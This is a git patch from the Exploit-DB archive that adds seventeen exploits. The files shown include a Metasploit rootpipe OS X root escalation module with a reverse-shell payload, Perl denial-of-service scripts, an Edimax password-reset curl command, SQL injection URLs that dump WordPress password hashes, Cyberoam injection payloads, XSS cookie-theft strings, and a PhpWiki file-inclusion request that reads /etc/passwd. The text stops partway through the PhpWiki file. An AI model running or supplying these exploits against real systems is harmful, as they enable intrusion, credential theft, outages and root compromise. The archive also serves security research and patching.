From 270dc872cf906f08d0c02070ebb7ceb6dddd0c94 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 1 Sep 2015 05:02:37 +0000
Subject: [PATCH] DB: 2015-09-01

17 new exploits
---
 files.csv                            |  17 +++
 platforms/hardware/webapps/38029.txt |  46 ++++++
 platforms/hardware/webapps/38034.txt |  48 +++++++
 platforms/ios/dos/38032.pl           |  59 ++++++++
 platforms/multiple/dos/38021.pl      |  65 +++++++++
 platforms/osx/local/38036.rb         | 161 +++++++++++++++++++++
 platforms/php/webapps/38022.txt      |   7 +
 platforms/php/webapps/38023.txt      |   7 +
 platforms/php/webapps/38024.txt      |  17 +++
 platforms/php/webapps/38025.txt      |  11 ++
 platforms/php/webapps/38026.txt      |   7 +
 platforms/php/webapps/38027.txt      | 200 +++++++++++++++++++++++++++
 platforms/php/webapps/38030.php      |  38 +++++
 platforms/windows/dos/38028.pl       |  58 ++++++++
 platforms/windows/dos/38031.pl       |  41 ++++++
 platforms/windows/local/38035.pl     |  41 ++++++
 platforms/windows/remote/38003.py    |  62 +++++++++
 platforms/windows/remote/38013.py    |  57 ++++++++
 18 files changed, 942 insertions(+)
 create mode 100755 platforms/hardware/webapps/38029.txt
 create mode 100755 platforms/hardware/webapps/38034.txt
 create mode 100755 platforms/ios/dos/38032.pl
 create mode 100755 platforms/multiple/dos/38021.pl
 create mode 100755 platforms/osx/local/38036.rb
 create mode 100755 platforms/php/webapps/38022.txt
 create mode 100755 platforms/php/webapps/38023.txt
 create mode 100755 platforms/php/webapps/38024.txt
 create mode 100755 platforms/php/webapps/38025.txt
 create mode 100755 platforms/php/webapps/38026.txt
 create mode 100755 platforms/php/webapps/38027.txt
 create mode 100755 platforms/php/webapps/38030.php
 create mode 100755 platforms/windows/dos/38028.pl
 create mode 100755 platforms/windows/dos/38031.pl
 create mode 100755 platforms/windows/local/38035.pl
 create mode 100755 platforms/windows/remote/38003.py
 create mode 100755 platforms/windows/remote/38013.py

diff --git a/files.csv b/files.csv
index fb221f3c7..32c2ce976 100755
--- a/files.csv
+++ b/files.csv
@@ -34315,6 +34315,7 @@ id,file,description,date,author,platform,type,port
 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
 38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
+38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0
 38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
@@ -34324,6 +34325,7 @@ id,file,description,date,author,platform,type,port
 38010,platforms/php/webapps/38010.txt,"VeriCentre Multiple SQL Injection Vulnerabilities",2012-11-06,"Cory Eubanks",php,webapps,0
 38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
 38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
+38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40  SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0
 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0
@@ -34331,3 +34333,18 @@ id,file,description,date,author,platform,type,port
 38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
 38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
 38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0
+38021,platforms/multiple/dos/38021.pl,"Media Player Classic <= 1.5 (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0
+38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection Vulnerability",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0
+38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0
+38024,platforms/php/webapps/38024.txt,"WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass Vulnerability",2012-07-19,"Tushar Dalvi",php,webapps,0
+38025,platforms/php/webapps/38025.txt,"Omni-Secure 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0
+38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager 'question' Parameter SQL Injection Vulnerability",2012-11-16,unsuprise,php,webapps,0
+38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80
+38028,platforms/windows/dos/38028.pl,"PFTP Server 8.0f Lite - textfield Local SEH Buffer Overflow",2015-08-31,"Robbie Corley",windows,dos,0
+38029,platforms/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Auth Bypass",2015-08-31,smash,hardware,webapps,80
+38030,platforms/php/webapps/38030.php,"Ganglia Web Frontend < 3.5.1 - PHP Code Execution",2015-08-31,"Andrei Costin",php,webapps,0
+38031,platforms/windows/dos/38031.pl,"Microsoft Office 2007 - msxml5.dll Crash PoC",2015-08-31,"Mohammad Reza Espargham",windows,dos,0
+38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service Vulnerability",2015-08-31,"Mohammad Reza Espargham",ios,dos,0
+38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection Vulnerability",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0
+38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
+38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements Rootpipe Privilege Escalation",2015-08-31,metasploit,osx,local,0
diff --git a/platforms/hardware/webapps/38029.txt b/platforms/hardware/webapps/38029.txt
new file mode 100755
index 000000000..cb522ba6d
--- /dev/null
+++ b/platforms/hardware/webapps/38029.txt
@@ -0,0 +1,46 @@
+# Title: Edimax PS-1206MF - Web Admin Auth Bypass
+# Date: 30.08.15
+# Vendor: edimax.com
+# Firmware version: 4.8.25
+# Author: Smash_
+# Contact: smash [at] devilteam.pl
+
+
+HTTP authorization is not being properly verified while sendind POST requests to .cgi, remote attacker is able to change specific settings or even reset admin password.
+
+By default, it is necessary to know current password in order to change it, but when request will be missing POST anewpass & confpass parameters, admin password will be set to null.
+
+devil@hell:~$ curl -gi http://192.168.0.10/
+HTTP/1.1 401 
+Date: Sat, 21 Dec 1996 12:00:00 GMT
+WWW-Authenticate: Basic realm="Default password:1234"
+
+401 Unauthorized - User authentication is required.
+
+Request:
+POST /PrtSet.cgi HTTP/1.1
+Host: 192.168.0.10
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.10/pssystem.htm
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 103
+
+BoxName=MFD55329&anewpass=1234&confpass=1234&PSPORTNAME1=&PSPORTNAME2=&PSPORTNAME3=&save.x=47&save.y=11
+
+Response:
+HTTP/1.1 200 OK
+Date: Sat, 21 Dec 1996 12:00:00 GMT
+Content-type: text/html
+
+<html><head><title>Advance Settings</title><link rel="stylesheet" href="set.css"></head>
+(...)
+
+
+Following curl request will set admin account with empty password.
+
+PoC:
+devil@hell:~$ curl -XPOST --data "" -s http://192.168.0.10/PrtSet.cgi > /dev/null
\ No newline at end of file
diff --git a/platforms/hardware/webapps/38034.txt b/platforms/hardware/webapps/38034.txt
new file mode 100755
index 000000000..7f7e02fa3
--- /dev/null
+++ b/platforms/hardware/webapps/38034.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Cyberoam : Blind SQL Injection
+# Date: 31/Aug/2015
+# Exploit Author: Dharmendra Kumar Singh
+# Contact: dsingh63@outlook.com
+# Vendor Homepage: http://www.cyberoam.com
+# Software Link: http://www.cyberoam.com/NGFW/
+# Version: CR500iNG-XP - 10.6.2 MR-1
+# Category: Firewall
+
+1. Description
+
+The username field in the captive portal of Cyberoam NG firewall is vulnerable to SQL Injection and can be exploited to execute sql commands on the database.
+
+The username field is vulnerable to the following types of SQL Injections
+
+a) Boolean-based blind sql injection
+b) Stacked queries
+
+2. Proof of Concept
+
+The data send to the server while logging in through the captive portal is like "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
+The query generated in backend server must be something like this
+SELECT password FROM table_name WHERE username = 'cyberuser'
+
+a) Boolean-based blind sql injection
+If a valid username/password combination is known than boolean-based blind sql injection can be done. If username is set to cyberuser' AND 'x'='x , data send will be "mode=191&username=cyberuser' AND 'x'='x&password=cyberpass&a=1439886198757&producttype=0"
+And sql query will become
+
+SELECT password FROM table_name WHERE username = 'cyberuser' AND 'x'='x'
+A successfull login message will be received in response in this case. But if username is set to cyberuser' AND 'x'='y than login fail message will be received in response, since x is not equal to y, hence this confirms that username field is vulnerable to boolean-based blind sql injection
+
+b) Stacked queries
+if username is set to cyberuser';SELECT PG_SLEEP(5) --  the resultant sql query will become
+SELECT password FROM table_name WHERE username = 'cyberuser';SELECT PG_SLEEP(5) -- '
+The stacked sql query "SELECT PG_SLEEP(5)" will make the current session’s process sleep until 5 seconds have elapsed. This confirms that Postgresql Server is used and stacked queries can be executed by providing crafted input to username field.
+
+3. Exploit
+
+Since the techniques are blind hence it is recommended to use an automated tool like SQLMap to exploit the vulnerability. The following command can be used to initiate the exploit
+sqlmap.py -u "http://example.com:8090/login.xml" --data "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
+
+4. Solution
+
+The backend server scripts do not sanitize user-supplied data before using it in the SQL query. Hence by properly sanitizing the data received in GET variable "username", the vulnerability can be patched.
+
+5. Conclusion
+
+The Cyberoam NG Firewall devices <= Version: CR500iNG-XP - 10.6.2 MR-1 are vulnerable to blind SQL Injection and this vulnerability can be exploited by an attacker to compromise the application, access or modify data
\ No newline at end of file
diff --git a/platforms/ios/dos/38032.pl b/platforms/ios/dos/38032.pl
new file mode 100755
index 000000000..c79e38dc2
--- /dev/null
+++ b/platforms/ios/dos/38032.pl
@@ -0,0 +1,59 @@
+#!/usr/bin/perl -w
+#-*- coding: utf-8 -*
+#
+#[+] Title:  Viber Non-Printable Characters Handling Denial of Service Vulnerability
+#[+] Product: Viber
+#[+] Vendor: http://www.viber.com/en/
+#[+] SoftWare Link : https://itunes.apple.com/app/viber-free-phone-calls/id382617920?mt=8
+#[+] Vulnerable Version(s): Viber 4.2.0 on IOS 7.1.2
+#
+#
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
+
+
+#Source :  http://www.securityfocus.com/bid/75217/info
+
+
+# 1.run perl code
+# 2.Copy the perl output text
+# 3.Open Viber Desktop
+# 4.Select Your VICTIM
+# 5.Paste and Message
+# 6.Enjoy
+
+
+use open ':std', ':encoding(UTF-8)';
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+use MIME::Base64;
+
+$ut="M7tktuYbL14T";
+$utd = decode_base64($ut);
+
+$lt="sNiw2KAg2KAg2Ao=";
+$ltd = decode_base64($lt);
+
+$bt="M7tktuYbL14T";
+$btd = decode_base64($bt);
+
+
+$junk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9".
+"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9".
+"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9".
+"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9".
+"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9".
+"Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9".
+"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9".
+"Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9".
+"Aq0Aq1Aq2Aq3Aq4Aq5Aq";
+$tt="\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
+"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05";
+
+$buffer = "A"x153; # 100xA
+$buffer1 = "A"x63; #5xA
+print "\n\n$utd$buffer$ltd$tt$buffer1$junk$btd\n\n";
+#END <3
diff --git a/platforms/multiple/dos/38021.pl b/platforms/multiple/dos/38021.pl
new file mode 100755
index 000000000..6bde26515
--- /dev/null
+++ b/platforms/multiple/dos/38021.pl
@@ -0,0 +1,65 @@
+source: http://www.securityfocus.com/bid/56567/info
+
+Media Player Classic WebServer is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability.
+
+An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+#!/usr/bin/perl
+use IO::Socket::INET;
+use Getopt::Std;
+use Socket;
+my $SOCKET = "";
+$loop = 1000;
+$ip = $ARGV[0];
+$port = $ARGV[1];
+if (! defined $ARGV[0])
+{
+print "\t*=============================================================*\n";
+print "\t* ---    MPC WebServer Remote Denial Of Service             ---*\n";
+print "\t* ---          By : X-Cisadane                        ---*\n";
+print "\t* ---  ------------------------------------------------    ---*\n";
+print "\t* ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*\n";
+print "\t* ---                                                      ---*\n";
+print "\t*=============================================================*\n";
+print "\n";
+print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n"; 
+print "Default Port for MPC Web Server is 13579\n";
+  
+exit;
+}
+ 
+print "\t*=============================================================*\n";
+print "\t* ---    MPC WebServer Remote Denial Of Service             ---*\n";
+print "\t* ---          By : X-Cisadane                        ---*\n";
+print "\t* ---  ------------------------------------------------    ---*\n";
+print "\t* ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*\n";
+print "\t* ---                                                      ---*\n";
+print "\t*=============================================================*\n";
+print "\n";
+print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n"; 
+print "Default Port for MPC Web Server is 13579\n";
+print "\n"; 
+print " Please Wait Till The Buffer is Done\n";
+my $b1 = "\x41" x 100000000;
+
+$iaddr = inet_aton($ip) || die "Unknown host: $ip\n";
+$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
+$proto = getprotobyname('tcp') || die "getprotobyname: $!\n";
+
+print "\n";
+print " Attacking the Target, Please Wait Till Pwned \n";
+ 
+for ($j=1;$j<$loop;$j++) { 
+socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
+connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n";
+ 
+$DoS=IO::Socket::INET->new("$ip:$port") or die;
+send(SOCKET,$b1, 0) || die "failure sent: $!\n";
+ 
+print $DoS "stor $b1\n";
+print $DoS "QUIT\n";
+ 
+close $DoS;
+close SOCKET; 
+}
+# exit :
diff --git a/platforms/osx/local/38036.rb b/platforms/osx/local/38036.rb
new file mode 100755
index 000000000..54ba903dd
--- /dev/null
+++ b/platforms/osx/local/38036.rb
@@ -0,0 +1,161 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+  Rank = GreatRanking
+
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apple OS X Entitlements Rootpipe Privilege Escalation',
+      'Description'    => %q{
+        This module exploits the rootpipe vulnerability and bypasses Apple's initial
+        fix for the issue by injecting code into a process with the 'admin.writeconfig'
+        entitlement.
+      },
+      'Author'         => [
+        'Emil Kvarnhammar', # Vulnerability discovery and PoC
+        'joev'              # Copy/paste monkey
+      ],
+      'References'     => [
+        ['CVE',   '2015-3673'],
+        ['URL',   'https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/']
+      ],
+      'DisclosureDate' => 'Jul 1 2015',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'osx',
+      'Arch'           => ARCH_X86_64,
+      'SessionTypes'   => ['shell'],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Mac OS X 10.9-10.10.3', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp',
+        'PrependSetreuid' => true
+      }
+    ))
+
+    register_options([
+      OptString.new('WRITABLEDIR', [true, 'Writable directory', '/.Trashes'])
+    ])
+  end
+
+  def check
+    if ver? && admin?
+      vprint_status("Version is between 10.9 and 10.10.3, and is admin.")
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("Copying Directory Utility.app to #{new_app}")
+    cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'")
+    cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'")
+
+    print_status("Writing bundle plist to `#{plist_file}'")
+    write_file(plist_file, plist)
+
+    print_status("Writing payload to `#{payload_file}'")
+    write_file(payload_file, binary_payload)
+    register_file_for_cleanup(payload_file)
+
+    print_status("Writing malicious shared library to `#{exploit_file}'")
+    write_file(exploit_file, plugin_exploit)
+
+    print_status("Running Directory Utility.app")
+    cmd_exec("/bin/sh -c 'PAYLOAD_IN="+payload_file+" PAYLOAD_OUT="+root_file+" #{new_app}/Contents/MacOS/Directory\\ Utility'")
+
+    print_status("Deleting Directory Utility.app")
+    cmd_exec('rm -Rf "#{new_app}"')
+
+    print_status('Executing payload...')
+    cmd_exec("/bin/sh -c '#{root_file} &'")
+  end
+
+  def ver?
+    Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+      Gem::Version.new('10.9'), Gem::Version.new('10.10.3')
+    )
+  end
+
+  def admin?
+    cmd_exec('groups | grep -wq admin && echo true') == 'true'
+  end
+
+  def sploit
+    "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
+  end
+
+  def plugin_exploit
+    File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'CVE-2015-3673', 'exploit.daplug'
+    ))
+  end
+
+  def binary_payload
+    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+  end
+
+  def exploit_file
+    "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle"
+  end
+
+  def plist_file
+    "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist"
+  end
+
+  def new_app
+    @app ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}.app"
+  end
+
+  def plist
+    %Q|
+      <?xml version="1.0" encoding="UTF-8"?>
+      <plist version="1.0">
+      <dict>
+        <key>CFBundleGetInfoString</key>
+        <string>RootpipeBundle</string>
+        <key>CFBundleExecutable</key>
+        <string>RootpipeBundle</string>
+        <key>CFBundleIdentifier</key>
+        <string>com.root.pipe</string>
+        <key>CFBundleName</key>
+        <string>RootpipeBundle</string>
+        <key>CFBundleShortVersionString</key>
+        <string>0.01</string>
+        <key>CFBundleInfoDictionaryVersion</key>
+        <string>6.0</string>
+        <key>CFBundlePackageType</key>
+        <string>APPL</string>
+        <key>IFMajorVersion</key>
+        <integer>0</integer>
+        <key>IFMinorVersion</key>
+        <integer>1</integer>
+      </dict>
+      </plist>
+    |
+  end
+
+  def payload_file
+    @payload_file ||=
+      "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
+  end
+
+  def root_file
+    @root_file ||=
+      "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/38022.txt b/platforms/php/webapps/38022.txt
new file mode 100755
index 000000000..ad782b81e
--- /dev/null
+++ b/platforms/php/webapps/38022.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56568/info
+
+The Dailyedition-mouss theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,user_pass%29,14,15,16,17,18,19,20+from+wp_users-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/38023.txt b/platforms/php/webapps/38023.txt
new file mode 100755
index 000000000..4e4191908
--- /dev/null
+++ b/platforms/php/webapps/38023.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56569/info
+
+The Tagged Albums plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/wp-content/plugins/taggedalbums/image.php?id=[sql] 
\ No newline at end of file
diff --git a/platforms/php/webapps/38024.txt b/platforms/php/webapps/38024.txt
new file mode 100755
index 000000000..5df34c3b8
--- /dev/null
+++ b/platforms/php/webapps/38024.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/56570/info
+
+WebKit is prone to a security-bypass vulnerability.
+
+An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials. 
+
+Code in test.jsp:
+
+<title>Test Page</title>
+<script>
+var foo = "<%= request.getParameter("foo") %>";
+document.write("<text>Welcome "+ foo + "</text>");
+</script>
+
+Example URI:
+
+http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1 
\ No newline at end of file
diff --git a/platforms/php/webapps/38025.txt b/platforms/php/webapps/38025.txt
new file mode 100755
index 000000000..5ee896c9f
--- /dev/null
+++ b/platforms/php/webapps/38025.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/56575/info
+
+Omni-Secure is prone to multiple file-disclosure vulnerabilities.
+
+An attacker can exploit these issues to view local files in the context of the web server process. This may aid in further attacks.
+
+Versions Omni-Secure 5, 6 and 7 are vulnerable. 
+
+http://www.example.co/mpath/lib/browsefiles.php?dir=/
+
+http://www.example.co/mpath/lib/browsefolders.php?dir=/ 
\ No newline at end of file
diff --git a/platforms/php/webapps/38026.txt b/platforms/php/webapps/38026.txt
new file mode 100755
index 000000000..c91eff35c
--- /dev/null
+++ b/platforms/php/webapps/38026.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56576/info
+
+Friends in War The FAQ Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/38027.txt b/platforms/php/webapps/38027.txt
new file mode 100755
index 000000000..76a0454b0
--- /dev/null
+++ b/platforms/php/webapps/38027.txt
@@ -0,0 +1,200 @@
+# Title: phpwiki 1.5.4 - Cross Site Scripting / Local File Inclusion
+# Date: 29.08.15
+# Vendor: sourceforge.net/projects/phpwiki/
+# Affected versions: => 1.5.4 (current)
+# Tested on: Apache2.2 / PHP5 / Deb32
+# Author: Smash_
+# Contact: smash [at] devilteam.pl
+
+
+1/ Cross Site Scripting
+
+Cross-site scripting vulnerability in user preferences allows remote unauthenticated users to inject arbitrary web script by injecting code via GET or POST 'pagename' parameter. 
+
+Example url:
+http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--
+
+Example request:
+POST /phpwiki/index.php/UserPreferences HTTP/1.1
+Host: 192.168.0.10
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: folder_p-tbx=Open; PHPSESSID=3ko4uprjgmnjtmfkes3dnh0gk4; PhpWiki_WIKI_ID=admin
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 260
+
+pref%5Bemail%5D=&pref%5BnotifyPages%5D=&pref%5Btheme%5D=&pref%5Blang%5D=&pref%5BeditHeight%5D=22&pref%5BeditWidth%5D=80&pref%5BtimeOffset%5D=0&pagename=UserPreferencesabc%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--&action=browse
+
+Example response:
+HTTP/1.1 200 OK
+Date: Sat, 29 Aug 2015 21:30:47 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+Vary: Accept-Encoding
+Content-Length: 16114
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+(...)
+<script type="text/javascript">
+<!--//
+var rateit_imgsrc = '/phpwiki/themes/wikilens/images/RateIt';
+var rateit_action = 'RateIt';
+// --></script>
+<script type="text/javascript">
+<!--//
+var data_path = '/phpwiki';
+var pagename  = 'UserPreferencesabc</script><script>alert(document.cookie)</script><!--';
+var script_url= '/phpwiki/index.php';
+var stylepath = data_path+'/themes/Sidebar/';
+var folderArrowPath = '/phpwiki/themes/default/images';
+var use_path_info = true;
+// --></script>
+</head>
+(...)
+
+
+2/ Local File Inclusion
+
+Directory traversal vulnerability in file load section allows authenticated attackers to read arbitrary files via POST or GET 'source' parameter. Content of file will be later available in created page.
+
+Example url:
+http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration?action=loadfile&overwrite=1&source=/etc/group
+
+#1 - Example request:
+POST /phpwiki/index.php/PhpWikiAdministration HTTP/1.1
+Host: 192.168.0.10
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
+Cookie: folder_p-tbx=Open; folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 76
+
+action=loadfile&overwrite=&pagename=PhpWikiAdministration&source=/etc/passwd
+
+#1 - Example response:
+HTTP/1.1 200 OK
+Date: Sat, 29 Aug 2015 22:09:36 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+Vary: Accept-Encoding
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+Content-Length: 3534
+(...)
+<a id="contentTop"></a>
+<h1 class="firstHeading">Loading “/etc/passwd”</h1>
+      <div id="bodyContent">
